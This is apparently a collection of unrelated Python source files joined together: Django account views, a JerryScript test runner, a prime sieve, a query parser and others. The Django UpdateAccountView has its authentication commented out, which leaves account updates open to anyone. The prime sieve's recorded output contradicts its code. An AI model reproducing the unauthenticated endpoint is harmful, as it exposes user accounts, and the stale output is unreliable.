        scheduler = "Current scheduler is PyCOMPSs"
        self.task_instance = task(*args, **kwargs)

    def __call__(self, f):
        # Delegate decoration of f to the wrapped PyCOMPSs task decorator.
        return self.task_instance(f)


def barrier():  # Wait
    # Block until all previously submitted PyCOMPSs tasks have completed.
    compss_barrier()


def get_value_from_remote(obj):  # Gather
    """Synchronize on *obj* and return its actual (local) value."""
    return compss_wait_on(obj)


def delete_object(obj):  # Release
    # Tell the runtime obj is no longer needed so its storage can be freed.
    compss_delete_object(obj)


def delete_file(file_path):
    # Ask the runtime to remove the (possibly remote) file at file_path.
    compss_delete_file(file_path)


def compute(obj):  # Submit task
    """Identity hook: submission happens via decorators, so obj is returned unchanged."""
    return obj

from rest_framework import generics, permissions, views, response,status
from .models import Account
from .serializers import AccountCreateSerializer, AccountSerializer, AuthenticateSerializer, \
    UpdateAccountSerializer, AccountRetrieveSerializer


# Create your views here.


class AccountCreateView(generics.CreateAPIView):
    """POST endpoint that registers a new Account; open to anonymous users."""
    queryset = Account.objects.all()
    serializer_class = AccountCreateSerializer
    permission_classes = [permissions.AllowAny]


class AccountListView(generics.ListAPIView):
    """GET endpoint listing all accounts; requires an authenticated caller."""
    queryset = Account.objects.all()
    serializer_class = AccountSerializer
    permission_classes = [permissions.IsAuthenticated]


class AccountRetrieveView(generics.RetrieveAPIView):
    """GET endpoint returning a single account by its lookup field."""
    queryset = Account.objects.all()
    serializer_class = AccountRetrieveSerializer


class UpdateAccountView(generics.UpdateAPIView):
    """PUT/PATCH endpoint updating an account.

    NOTE(review): authentication is commented out below, so this endpoint is
    currently writable by anyone — confirm this is intentional.
    """
    queryset = Account.objects.all()
    serializer_class = UpdateAccountSerializer
    # permission_classes = [permissions.IsAuthenticated]


class AccountAuthenticationView(views.APIView):
    """POST endpoint validating credentials via AuthenticateSerializer."""
    queryset = Account.objects.all()
    serializer_class = AuthenticateSerializer

    def post(self, request):
        """Validate posted credentials and return the serialized payload.

        With raise_exception=True, is_valid() raises a ValidationError
        (rendered as HTTP 400) instead of returning False, so the old
        unreachable `serializer.errors` branch was removed. Also fixed the
        `new_date` -> `new_data` local-name typo.
        """
        serializer = AuthenticateSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        new_data = serializer.data
        return response.Response(new_data, status=status.HTTP_200_OK)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = 'litleleprikon'


from random import randint


FIGURES = ['камень', 'бумага', 'ножницы']
FIG_LEN = len(FIGURES)

class Player:
    """
    Player class is needed to store tactics and to generate figures by this tactic

    -- Doctests --
    >>> player = Player(1)
    >>> player.figure in FIGURES
    True
    """
    def __init__(self, number: int):
        self.name = 'игрок{}'.format(number)
        tactic = randint(0, FIG_LEN - 1)
        self.main_figure = FIGURES[tactic]
        self.__figures = [FIGURES[(tactic + i) % FIG_LEN] for i in range(FIG_LEN)]

    def __str__(self):
        return '{}: {}'.format(self.name, self.main_figure)

    @property
    def figure(self):
        # Bug fix: randint(0, FIG_LEN) is inclusive, so after "% FIG_LEN"
        # index 0 was drawn twice as often as the others; sample uniformly.
        # (Also fixed the class doctest, which called Player() without the
        # required `number` argument.)
        return self.__figures[randint(0, FIG_LEN - 1)]

#!/usr/bin/env python

# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import print_function

import argparse
import collections
import hashlib
import os
import subprocess
import sys
import settings

# All test build trees live under <project>/build/tests by default.
OUTPUT_DIR = os.path.join(settings.PROJECT_DIR, 'build', 'tests')

# A named test configuration: extra build flags plus extra runner flags.
Options = collections.namedtuple('Options', ['name', 'build_args', 'test_args'])
# Make build_args and test_args optional (both default to empty lists).
Options.__new__.__defaults__ = ([], [])

OPTIONS_PROFILE_MIN = ['--profile=minimal']
OPTIONS_PROFILE_ES51 = [] # NOTE: same as ['--profile=es5.1']
OPTIONS_PROFILE_ES2015 = ['--profile=es2015-subset']
OPTIONS_DEBUG = ['--debug']
OPTIONS_SNAPSHOT = ['--snapshot-save=on', '--snapshot-exec=on', '--jerry-cmdline-snapshot=on']
OPTIONS_UNITTESTS = ['--unittests=on', '--jerry-cmdline=off', '--error-messages=on',
                     '--snapshot-save=on', '--snapshot-exec=on', '--vm-exec-stop=on',
                     '--line-info=on', '--mem-stats=on']
OPTIONS_DOCTESTS = ['--doctests=on', '--jerry-cmdline=off', '--error-messages=on',
                    '--snapshot-save=on', '--snapshot-exec=on', '--vm-exec-stop=on']

# Test options for unittests
# Each configuration is built once (see BINARY_CACHE) and then exercised by
# the matching runner function below.
JERRY_UNITTESTS_OPTIONS = [
    Options('unittests-es2015_subset',
            OPTIONS_UNITTESTS + OPTIONS_PROFILE_ES2015),
    Options('unittests-es2015_subset-debug',
            OPTIONS_UNITTESTS + OPTIONS_PROFILE_ES2015 + OPTIONS_DEBUG),
    Options('doctests-es2015_subset',
            OPTIONS_DOCTESTS + OPTIONS_PROFILE_ES2015),
    Options('doctests-es2015_subset-debug',
            OPTIONS_DOCTESTS + OPTIONS_PROFILE_ES2015 + OPTIONS_DEBUG),
    Options('unittests-es5.1',
            OPTIONS_UNITTESTS + OPTIONS_PROFILE_ES51),
    Options('unittests-es5.1-debug',
            OPTIONS_UNITTESTS + OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG),
    Options('doctests-es5.1',
            OPTIONS_DOCTESTS + OPTIONS_PROFILE_ES51),
    Options('doctests-es5.1-debug',
            OPTIONS_DOCTESTS + OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG)
]

# Test options for jerry-tests
JERRY_TESTS_OPTIONS = [
    Options('jerry_tests-es5.1',
            OPTIONS_PROFILE_ES51),
    Options('jerry_tests-es5.1-snapshot',
            OPTIONS_PROFILE_ES51 + OPTIONS_SNAPSHOT,
            ['--snapshot']),
    Options('jerry_tests-es5.1-debug',
            OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG),
    Options('jerry_tests-es5.1-debug-snapshot',
            OPTIONS_PROFILE_ES51 + OPTIONS_SNAPSHOT + OPTIONS_DEBUG,
            ['--snapshot']),
    Options('jerry_tests-es5.1-debug-cpointer_32bit',
            OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG + ['--cpointer-32bit=on', '--mem-heap=1024']),
    Options('jerry_tests-es5.1-debug-external_context',
            OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG + ['--jerry-libc=off', '--external-context=on']),
    Options('jerry_tests-es2015_subset-debug',
            OPTIONS_PROFILE_ES2015 + OPTIONS_DEBUG),
]

# Test options for jerry-test-suite
# (the full suite runs everything jerry-tests runs, plus the entries below)
JERRY_TEST_SUITE_OPTIONS = JERRY_TESTS_OPTIONS[:]
JERRY_TEST_SUITE_OPTIONS.extend([
    Options('jerry_test_suite-minimal',
            OPTIONS_PROFILE_MIN),
    Options('jerry_test_suite-minimal-snapshot',
            OPTIONS_PROFILE_MIN + OPTIONS_SNAPSHOT,
            ['--snapshot']),
    Options('jerry_test_suite-minimal-debug',
            OPTIONS_PROFILE_MIN + OPTIONS_DEBUG),
    Options('jerry_test_suite-minimal-debug-snapshot',
            OPTIONS_PROFILE_MIN + OPTIONS_SNAPSHOT + OPTIONS_DEBUG,
            ['--snapshot']),
    Options('jerry_test_suite-es2015_subset',
            OPTIONS_PROFILE_ES2015),
    Options('jerry_test_suite-es2015_subset-snapshot',
            OPTIONS_PROFILE_ES2015 + OPTIONS_SNAPSHOT,
            ['--snapshot']),
    Options('jerry_test_suite-es2015_subset-debug-snapshot',
            OPTIONS_PROFILE_ES2015 + OPTIONS_SNAPSHOT + OPTIONS_DEBUG,
            ['--snapshot']),
])

# Test options for test262
TEST262_TEST_SUITE_OPTIONS = [
    Options('test262_tests')
]

# Test options for jerry-debugger
DEBUGGER_TEST_OPTIONS = [
    Options('jerry_debugger_tests',
            ['--debug', '--jerry-debugger=on', '--jerry-libc=off'])
]

# Test options for buildoption-test
JERRY_BUILDOPTIONS = [
    Options('buildoption_test-lto',
            ['--lto=on']),
    Options('buildoption_test-error_messages',
            ['--error-messages=on']),
    Options('buildoption_test-all_in_one',
            ['--all-in-one=on']),
    Options('buildoption_test-valgrind',
            ['--valgrind=on']),
    Options('buildoption_test-mem_stats',
            ['--mem-stats=on']),
    Options('buildoption_test-show_opcodes',
            ['--show-opcodes=on']),
    Options('buildoption_test-show_regexp_opcodes',
            ['--show-regexp-opcodes=on']),
    Options('buildoption_test-compiler_default_libc',
            ['--jerry-libc=off']),
    Options('buildoption_test-cpointer_32bit',
            ['--jerry-libc=off', '--compile-flag=-m32', '--cpointer-32bit=on', '--system-allocator=on']),
    Options('buildoption_test-external_context',
            ['--jerry-libc=off', '--external-context=on']),
    Options('buildoption_test-shared_libs',
            ['--jerry-libc=off', '--shared-libs=on']),
    Options('buildoption_test-cmdline_test',
            ['--jerry-cmdline-test=on']),
    Options('buildoption_test-cmdline_snapshot',
            ['--jerry-cmdline-snapshot=on']),
]

def get_arguments():
    """Parse command-line options; print usage and exit(1) when run bare."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--toolchain', metavar='FILE',
                        help='Add toolchain file')
    parser.add_argument('-q', '--quiet', action='store_true',
                        help='Only print out failing tests')
    parser.add_argument('--buildoptions', metavar='LIST',
                        help='Add a comma separated list of extra build options to each test')
    parser.add_argument('--skip-list', metavar='LIST',
                        help='Add a comma separated list of patterns of the excluded JS-tests')
    parser.add_argument('--outdir', metavar='DIR', default=OUTPUT_DIR,
                        help='Specify output directory (default: %(default)s)')
    parser.add_argument('--check-signed-off', metavar='TYPE', nargs='?',
                        choices=['strict', 'tolerant', 'travis'], const='strict',
                        help='Run signed-off check (%(choices)s; default type if not given: %(const)s)')
    parser.add_argument('--check-cppcheck', action='store_true',
                        help='Run cppcheck')
    parser.add_argument('--check-doxygen', action='store_true',
                        help='Run doxygen')
    parser.add_argument('--check-pylint', action='store_true',
                        help='Run pylint')
    parser.add_argument('--check-vera', action='store_true',
                        help='Run vera check')
    parser.add_argument('--check-license', action='store_true',
                        help='Run license check')
    parser.add_argument('--check-magic-strings', action='store_true',
                        help='Run "magic string source code generator should be executed" check')
    parser.add_argument('--jerry-debugger', action='store_true',
                        help='Run jerry-debugger tests')
    parser.add_argument('--jerry-tests', action='store_true',
                        help='Run jerry-tests')
    parser.add_argument('--jerry-test-suite', action='store_true',
                        help='Run jerry-test-suite')
    parser.add_argument('--test262', action='store_true',
                        help='Run test262')
    parser.add_argument('--unittests', action='store_true',
                        help='Run unittests (including doctests)')
    parser.add_argument('--buildoption-test', action='store_true',
                        help='Run buildoption-test')
    parser.add_argument('--all', '--precommit', action='store_true',
                        help='Run all tests')

    # With no arguments at all there is nothing to run: show usage and fail.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    script_args = parser.parse_args()

    return script_args

# Maps a sorted tuple of build options -> (returncode, build_dir_path) so
# identical configurations are only built once per run.
BINARY_CACHE = {}

def create_binary(job, options):
    """Build the binary for *job*, reusing a cached result when the same
    effective build options were already built this run.

    Returns:
        (returncode, build_dir_path) tuple; returncode is 0 on success.
    """
    build_args = job.build_args[:]
    # Merge user-supplied extra options, keeping first occurrence only.
    if options.buildoptions:
        for option in options.buildoptions.split(','):
            if option not in build_args:
                build_args.append(option)

    build_dir_path = os.path.join(options.outdir, job.name)
    install_dir_path = os.path.join(build_dir_path, 'local')

    build_cmd = [settings.BUILD_SCRIPT] + build_args
    build_cmd.append('--builddir=%s' % build_dir_path)
    build_cmd.append('--install=%s' % install_dir_path)
    if options.toolchain:
        build_cmd.append('--toolchain=%s' % options.toolchain)

    sys.stderr.write('Build command: %s\n' % ' '.join(build_cmd))

    # The cache key ignores option order so equivalent builds are shared.
    binary_key = tuple(sorted(build_args))
    if binary_key in BINARY_CACHE:
        ret, build_dir_path = BINARY_CACHE[binary_key]
        sys.stderr.write('(skipping: already built at %s with returncode %d)\n' % (build_dir_path, ret))
        return ret, build_dir_path

    try:
        subprocess.check_output(build_cmd)
        ret = 0
    except subprocess.CalledProcessError as err:
        ret = err.returncode

    BINARY_CACHE[binary_key] = (ret, build_dir_path)
    return ret, build_dir_path

def get_binary_path(build_dir_path):
    """Return the path of the installed jerry binary under *build_dir_path*."""
    install_bin_dir = os.path.join(build_dir_path, 'local', 'bin')
    return os.path.join(install_bin_dir, 'jerry')

def hash_binary(bin_path):
    """Return the SHA-1 hex digest of the file at *bin_path*."""
    hasher = hashlib.sha1()
    with open(bin_path, 'rb') as bin_file:
        # Feed the file to the hasher in fixed-size chunks to bound memory.
        for chunk in iter(lambda: bin_file.read(65536), b''):
            hasher.update(chunk)
    return hasher.hexdigest()

def iterate_test_runner_jobs(jobs, options):
    """Yield (job, build_returncode, test_cmd) for each job worth running.

    Jobs whose binary fails to build are yielded with test_cmd=None so the
    caller can report the failure; jobs whose build directory or binary hash
    duplicates an already-tested one are skipped entirely.
    """
    tested_paths = set()
    tested_hashes = {}

    for job in jobs:
        ret_build, build_dir_path = create_binary(job, options)
        if ret_build:
            # Bug fix: the original yielded a 4-tuple here while every
            # consumer unpacks three values (ValueError), and then fell
            # through to hash a binary that was never built. Yield a
            # 3-tuple and move on to the next job.
            yield job, ret_build, None
            continue

        if build_dir_path in tested_paths:
            sys.stderr.write('(skipping: already tested with %s)\n' % build_dir_path)
            continue
        tested_paths.add(build_dir_path)

        bin_path = get_binary_path(build_dir_path)
        bin_hash = hash_binary(bin_path)

        if bin_hash in tested_hashes:
            sys.stderr.write('(skipping: already tested with equivalent %s)\n' % tested_hashes[bin_hash])
            continue
        tested_hashes[bin_hash] = build_dir_path

        yield job, ret_build, [settings.TEST_RUNNER_SCRIPT, bin_path]

def run_check(runnable):
    """Execute *runnable* and return its exit status (0 on success)."""
    sys.stderr.write('Test command: %s\n' % ' '.join(runnable))

    try:
        # check_call returns 0 when the command succeeds.
        return subprocess.check_call(runnable)
    except subprocess.CalledProcessError as err:
        return err.returncode

def run_jerry_debugger_tests(options):
    """Build the debugger-enabled binary and run every .cmd debugger test."""
    ret_build = ret_test = 0
    for job in DEBUGGER_TEST_OPTIONS:
        ret_build, build_dir_path = create_binary(job, options)
        if ret_build:
            break

        for test_file in os.listdir(settings.DEBUGGER_TESTS_DIR):
            if not test_file.endswith(".cmd"):
                continue
            test_case = os.path.splitext(test_file)[0]
            test_case_path = os.path.join(settings.DEBUGGER_TESTS_DIR, test_case)
            test_cmd = [
                settings.DEBUGGER_TEST_RUNNER_SCRIPT,
                get_binary_path(build_dir_path),
                settings.DEBUGGER_CLIENT_SCRIPT,
                os.path.relpath(test_case_path, settings.PROJECT_DIR)
            ]
            if job.test_args:
                test_cmd.extend(job.test_args)

            ret_test |= run_check(test_cmd)

    return ret_build | ret_test

def run_jerry_tests(options):
    """Run the jerry-tests suite against every prebuilt configuration."""
    ret_build = ret_test = 0
    for job, ret_build, test_cmd in iterate_test_runner_jobs(JERRY_TESTS_OPTIONS, options):
        if ret_build:
            break

        test_cmd.append(settings.JERRY_TESTS_DIR)
        if options.quiet:
            test_cmd.append("-q")

        # The es5.1 and es2015 test trees are mutually exclusive per profile.
        if '--profile=es2015-subset' in job.build_args:
            skip_list = [r"es5.1\/"]
        else:
            skip_list = [r"es2015\/"]
        if options.skip_list:
            skip_list.append(options.skip_list)
        test_cmd.append("--skip-list=" + ",".join(skip_list))

        if job.test_args:
            test_cmd.extend(job.test_args)

        ret_test |= run_check(test_cmd)

    return ret_build | ret_test

def run_jerry_test_suite(options):
    """Run the jerry-test-suite list matching each build's profile."""
    ret_build = ret_test = 0
    for job, ret_build, test_cmd in iterate_test_runner_jobs(JERRY_TEST_SUITE_OPTIONS, options):
        if ret_build:
            break

        # Pick the test list (or directory) matching the build profile.
        if '--profile=minimal' in job.build_args:
            suite = settings.JERRY_TEST_SUITE_MINIMAL_LIST
        elif '--profile=es2015-subset' in job.build_args:
            suite = settings.JERRY_TEST_SUITE_DIR
        else:
            suite = settings.JERRY_TEST_SUITE_ES51_LIST
        test_cmd.append(suite)

        if options.quiet:
            test_cmd.append("-q")
        if options.skip_list:
            test_cmd.append("--skip-list=" + options.skip_list)
        if job.test_args:
            test_cmd.extend(job.test_args)

        ret_test |= run_check(test_cmd)

    return ret_build | ret_test

def run_test262_test_suite(options):
    """Build each configured job and run the test262 conformance suite."""
    ret_build = ret_test = 0
    for job in TEST262_TEST_SUITE_OPTIONS:
        ret_build, build_dir_path = create_binary(job, options)
        if ret_build:
            # Build failure: abort and propagate the build return code.
            break

        test_cmd = [settings.TEST262_RUNNER_SCRIPT,
                    get_binary_path(build_dir_path),
                    settings.TEST262_TEST_SUITE_DIR]
        test_cmd.extend(job.test_args or [])

        ret_test |= run_check(test_cmd)

    return ret_build | ret_test

def run_unittests(options):
    """Build each unittest configuration and run its unit tests."""
    ret_build = ret_test = 0
    for job in JERRY_UNITTESTS_OPTIONS:
        ret_build, build_dir_path = create_binary(job, options)
        if ret_build:
            # Build failure: abort and propagate the build return code.
            break

        quiet_flag = "-q" if options.quiet else ""
        runner_cmd = [settings.UNITTEST_RUNNER_SCRIPT,
                      os.path.join(build_dir_path, 'tests'),
                      quiet_flag]
        ret_test |= run_check(runner_cmd)

    return ret_build | ret_test

def run_buildoption_test(options):
    """Build every build-option configuration, stopping at the first failure.

    Returns the return code of the first failing build, or 0 when all
    configurations build successfully.

    Bug fix: `ret` was only assigned inside the loop, so an empty
    JERRY_BUILDOPTIONS list raised NameError at the final `return`.
    """
    ret = 0
    for job in JERRY_BUILDOPTIONS:
        ret, _build_dir = create_binary(job, options)
        if ret:
            break

    return ret

# One CI gate: `enabled` holds the CLI flag value, `runner` the callable to
# invoke, and `arg` the single argument passed to that callable.
Check = collections.namedtuple('Check', ['enabled', 'runner', 'arg'])

def main(options):
    """Run every enabled check (or every check with --all); exit on failure."""
    # The static-analysis checks shell out through run_check with a script
    # command line; the test-suite checks receive the parsed options object.
    checks = [
        Check(options.check_signed_off, run_check, [settings.SIGNED_OFF_SCRIPT]
              + {'tolerant': ['--tolerant'], 'travis': ['--travis']}.get(options.check_signed_off, [])),
        Check(options.check_cppcheck, run_check, [settings.CPPCHECK_SCRIPT]),
        Check(options.check_doxygen, run_check, [settings.DOXYGEN_SCRIPT]),
        Check(options.check_pylint, run_check, [settings.PYLINT_SCRIPT]),
        Check(options.check_vera, run_check, [settings.VERA_SCRIPT]),
        Check(options.check_license, run_check, [settings.LICENSE_SCRIPT]),
        Check(options.check_magic_strings, run_check, [settings.MAGIC_STRINGS_SCRIPT]),
        Check(options.jerry_debugger, run_jerry_debugger_tests, options),
        Check(options.jerry_tests, run_jerry_tests, options),
        Check(options.jerry_test_suite, run_jerry_test_suite, options),
        Check(options.test262, run_test262_test_suite, options),
        Check(options.unittests, run_unittests, options),
        Check(options.buildoption_test, run_buildoption_test, options),
    ]

    for check in checks:
        if check.enabled or options.all:
            ret = check.runner(check.arg)
            if ret:
                # Abort at the first failing check, propagating its code.
                sys.exit(ret)

if __name__ == "__main__":
    main(get_arguments())

import math


def isPrime(num):
    """Return True when *num* is a prime number, else False."""
    if num < 2:
        return False  # 0 and 1 are not prime

    # A composite number always has a factor no larger than its square
    # root (if a * b == num, one of a, b is <= sqrt(num)), so trial
    # division only needs to test up to sqrt(num).
    for candidate in range(2, int(math.sqrt(num)) + 1):
        if num % candidate == 0:
            return False

    return True

def primeSieve(size):
    """Return all primes below *size* as a list of decimal strings.

    Implements the sieve of Eratosthenes: cross out every multiple of
    each base value up to sqrt(size); whatever remains is prime.

    Bug fix: the original set ``sieve[1] = True``, so 1 was reported as
    prime — contradicting ``isPrime(1) == False`` above.  1 is not prime.
    """
    sieve = [True] * size  # sieve[n] is True while n is still possibly prime
    sieve[0] = False
    sieve[1] = False  # was True in the original; 1 is not a prime

    # Multiples of any factor > sqrt(size) were already crossed out by a
    # smaller cofactor, so only factors up to sqrt(size) need marking.
    boundary = int(math.sqrt(size)) + 1
    for i in range(2, boundary):
        pointer = i * 2  # start at the first proper multiple; i itself may be prime
        while pointer < size:
            sieve[pointer] = False
            pointer += i

    # Collect the surviving indices as strings (matches original output type).
    return [str(i) for i in range(size) if sieve[i]]


if __name__ == '__main__':
    # Demo: print all primes below 100 as one comma-separated line.
    primes = primeSieve(100)
    primesString = ", ".join(primes)
    print("prime : ", primesString)

# NOTE(review): the recorded output below lists 1 as prime, while isPrime(1)
# above returns False -- the two implementations disagree; confirm intent.
'''
prime :  1, 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97
'''
# -*- encoding: utf-8 -*-
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.


import pyparsing as pp

# Token classes of the filter grammar.
# NOTE(review): "uninary" is a typo for "unary"; the name is kept because
# other modules may import it.
uninary_operators = ("not", )
# Bug fix: the original tuple ended with `u"like" "in"` -- the missing comma
# made Python concatenate the adjacent literals into the bogus operator
# u"likein".  Both u"like" and u"in" already appear earlier in the tuple, so
# the stray element is simply dropped.
binary_operator = (u">=", u"<=", u"!=", u">", u"<", u"=", u"==", u"eq", u"ne",
                   u"lt", u"gt", u"ge", u"le", u"in", u"like", u"≠", u"≥",
                   u"≤")
multiple_operators = (u"and", u"or", u"∧", u"∨")

# Terminal parsers for operators and literal values.
operator = pp.Regex(u"|".join(binary_operator))
null = pp.Regex("None|none|null").setParseAction(pp.replaceWith(None))
boolean = "False|True|false|true"
boolean = pp.Regex(boolean).setParseAction(lambda t: t[0].lower() == "true")
hex_string = lambda n: pp.Word(pp.hexnums, exact=n)
uuid = pp.Combine(hex_string(8) + ("-" + hex_string(4)) * 3 +
                  "-" + hex_string(12))
number = r"[+-]?\d+(:?\.\d*)?(:?[eE][+-]?\d+)?"
number = pp.Regex(number).setParseAction(lambda t: float(t[0]))
identifier = pp.Word(pp.alphas, pp.alphanums + "_")
quoted_string = pp.QuotedString('"') | pp.QuotedString("'")

# A comparison operand: scalar literal, identifier, or bracketed list.
comparison_term = pp.Forward()
in_list = pp.Group(pp.Suppress('[') +
                   pp.Optional(pp.delimitedList(comparison_term)) +
                   pp.Suppress(']'))("list")
comparison_term << (null | boolean | uuid | identifier | number |
                    quoted_string | in_list)
condition = pp.Group(comparison_term + operator + comparison_term)

# Full boolean expression with not > and > or precedence (unicode synonyms
# ∧ / ∨ are accepted at the same precedence as and / or).
expr = pp.operatorPrecedence(condition, [
    ("not", 1, pp.opAssoc.RIGHT, ),
    ("and", 2, pp.opAssoc.LEFT, ),
    ("∧", 2, pp.opAssoc.LEFT, ),
    ("or", 2, pp.opAssoc.LEFT, ),
    ("∨", 2, pp.opAssoc.LEFT, ),
])


def _parsed_query2dict(parsed_query):
    """Fold one pyparsing result into a nested {operator: operand(s)} dict.

    Tokens are consumed from the END of `parsed_query` via pop(), so the
    expression is folded right-to-left; e.g. a parsed "a >= 1" becomes
    {u">=": {u"a": 1.0}}.
    """
    result = None
    while parsed_query:
        part = parsed_query.pop()
        if part in binary_operator:
            # `result` already holds the right-hand operand; the next pop
            # yields the left-hand one.
            result = {part: {parsed_query.pop(): result}}

        elif part in multiple_operators:
            # NOTE(review): assumes `result` is already a dict here (a
            # clause was folded before the and/or was reached) -- confirm
            # the grammar cannot produce a leading and/or.
            if result.get(part):
                # Same operator again: flatten into the existing operand list.
                result[part].append(
                    _parsed_query2dict(parsed_query.pop()))
            else:
                result = {part: [result]}

        elif part in uninary_operators:
            result = {part: result}
        elif isinstance(part, pp.ParseResults):
            kind = part.getName()
            if kind == "list":
                # Bracketed value list: keep it as a plain Python list.
                res = part.asList()
            else:
                # Nested (parenthesised) subexpression: recurse.
                res = _parsed_query2dict(part)
            if result is None:
                result = res
            elif isinstance(result, dict):
                # Attach the sub-result to the operand list of the
                # already-built and/or node.
                list(result.values())[0].append(res)
        else:
            # Plain scalar token (identifier, number, string, bool, None).
            result = part
    return result


def search_query_builder(query):
    """Parse a filter-expression string into the nested-dict search format."""
    # parseString returns the single top-level group; unwrap it before folding.
    parsed_query = expr.parseString(query)[0]
    return _parsed_query2dict(parsed_query)


def list2cols(cols, objs):
    """Project each mapping in *objs* onto *cols*; return (cols, rows)."""
    rows = [tuple(obj[col] for col in cols) for obj in objs]
    return cols, rows


def format_string_list(objs, field):
    """Collapse the string list at objs[field] into one comma-separated string (in place)."""
    values = objs[field]
    objs[field] = ", ".join(values)


def format_dict_list(objs, field):
    """Render the list of dicts at objs[field] as bullet lines (in place).

    Each dict becomes one "- k: v, k2: v2" line.
    """
    lines = []
    for elem in objs[field]:
        pairs = ", ".join("%s: %s" % (k, v) for k, v in elem.items())
        lines.append("- " + pairs)
    objs[field] = "\n".join(lines)


def format_move_dict_to_root(obj, field):
    """Flatten obj[field] into obj as "field/key" entries and drop obj[field]."""
    nested = obj[field]
    for key in nested:
        obj["%s/%s" % (field, key)] = nested[key]
    del obj[field]


def format_archive_policy(ap):
    """Prettify an archive-policy dict in place for tabular display."""
    # Render the list of definition dicts as one bullet-list string.
    format_dict_list(ap, "definition")
    # Collapse the aggregation-methods list into a comma-separated string.
    format_string_list(ap, "aggregation_methods")


def dict_from_parsed_args(parsed_args, attrs):
    """Collect the attributes named in *attrs* from *parsed_args*, skipping None values."""
    pairs = ((attr, getattr(parsed_args, attr)) for attr in attrs)
    return {name: value for name, value in pairs if value is not None}


def dict_to_querystring(objs):
    """Serialize the non-None items of *objs* as a "k=v&k2=v2" query string."""
    parts = []
    for key, value in objs.items():
        if value is not None:
            parts.append("%s=%s" % (key, value))
    return "&".join(parts)

# Copyright 2013 - Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from solum import objects

from solum.objects import extension as abstract_extension
from solum.objects import operation as abstract_operation
from solum.objects import plan as abstract_plan
from solum.objects import sensor as abstract_sensor
from solum.objects import service as abstract_srvc
from solum.objects.sqlalchemy import extension
from solum.objects.sqlalchemy import operation
from solum.objects.sqlalchemy import plan
from solum.objects.sqlalchemy import sensor
from solum.objects.sqlalchemy import service


def load():
    """Activate the sqlalchemy backend.

    Maps each abstract object interface to its sqlalchemy-backed
    implementation in the global object registry.
    """
    objects.registry.add(abstract_plan.Plan, plan.Plan)
    objects.registry.add(abstract_plan.PlanList, plan.PlanList)
    objects.registry.add(abstract_srvc.Service, service.Service)
    objects.registry.add(abstract_srvc.ServiceList, service.ServiceList)
    objects.registry.add(abstract_operation.Operation, operation.Operation)
    objects.registry.add(abstract_operation.OperationList,
                         operation.OperationList)
    objects.registry.add(abstract_sensor.Sensor, sensor.Sensor)
    objects.registry.add(abstract_sensor.SensorList, sensor.SensorList)
    objects.registry.add(abstract_extension.Extension, extension.Extension)
    objects.registry.add(abstract_extension.ExtensionList,
                         extension.ExtensionList)

# Dotted path to the Django AppConfig used when this package is installed
# as an app (legacy pre-Django-3.2 convention).
default_app_config = 'providers.com.dailyssrn.apps.AppConfig'

# -*- coding:utf-8 -*-
#
# Copyright (c) 2017 mooncake. All Rights Reserved
####
# @brief
# @author Eric Yue ( hi.moonlight@gmail.com )
# @version 0.0.1
from distutils.core import setup

# Package version, reused for the tagged download URL below.
V = "0.7"

setup(
    name="mooncake_utils",
    packages=["mooncake_utils"],
    version=V,
    description="just a useful utils for mooncake personal project.",
    author="mooncake",
    author_email="hi.moonlight@gmail.com",
    url="https://github.com/ericyue/mooncake_utils",
    download_url="https://github.com/ericyue/mooncake_utils/archive/%s.zip" % V,
    keywords=["utils", "data", "machine-learning"],  # arbitrary keywords
    classifiers=[],
)

# Copyright 2014 Mirantis Inc.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import collections
import copy
import datetime
import re

import mock
import six

from osprofiler import profiler
from osprofiler.tests import test


class ProfilerGlobMethodsTestCase(test.TestCase):
    """Tests for the module-level profiler API (clean/init/get/start/stop)."""

    def test_get_profiler_not_inited(self):
        profiler.clean()
        self.assertIsNone(profiler.get())

    def test_get_profiler_and_init(self):
        p = profiler.init("secret", base_id="1", parent_id="2")
        self.assertEqual(profiler.get(), p)

        self.assertEqual(p.get_base_id(), "1")
        # NOTE(boris-42): until we make the first start() call the current
        # id still equals the parent id passed to init().
        self.assertEqual(p.get_id(), "2")

    def test_start_not_inited(self):
        # start() must be a harmless no-op when no profiler was initialized.
        profiler.clean()
        profiler.start("name")

    def test_start(self):
        p = profiler.init("secret", base_id="1", parent_id="2")
        p.start = mock.MagicMock()
        profiler.start("name", info="info")
